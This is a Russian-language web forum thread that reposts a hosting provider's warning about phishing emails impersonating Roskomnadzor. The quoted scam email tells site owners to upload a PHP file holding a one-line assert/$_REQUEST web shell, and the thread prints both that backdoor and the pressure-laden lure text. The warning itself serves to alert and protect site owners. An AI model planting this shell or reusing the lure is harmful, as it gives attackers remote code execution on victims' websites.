Jump to content
Sign in to follow this  
LowTech

От хостера прилетело предупреждение. Осторожнее!

Recommended Posts

Письмо от Бегета с предупреждением.

 

Добрый день, ***********

Сегодня участились случаи взлома сайтов пользователей.

На контактный email домена приходят сообщения под видом письма от Роскомнадзора с просьбой разместить у себя файл reestr/reestr-id128032.php, содержащий в себе вредоносный код.

После размещения данного файла злоумышленники могут получить доступ к данным Вашего сайта.

Содержание мошеннического письма (вместо многоточия в тексте письма имя Вашего домена):

" Вы получили данное уведомление от Федеральной службы по надзору в сфере связи,
информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором
доменного имени … в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт … был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени … , Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:
< ?php
assert(stripslashes($_REQUEST[roskomnadzor]));
?>
*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: …/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени ..., следую инструкции указанной выше, то Ваш сайт … будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации "

Просьба игнорировать подобное письмо, а если Вы уже разместили данный файл, то незамедлительно удалите его.

Если требуется помощь в поиске вредоносных файлов или необходимы логи запросов к сайту, Вы всегда можете

Share this post


Link to post
Share on other sites

а у вас нет этого файла?)

Share this post


Link to post
Share on other sites

а у вас нет этого файла?)

Только что сделал, надеюсь не прикроют теперь :)

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.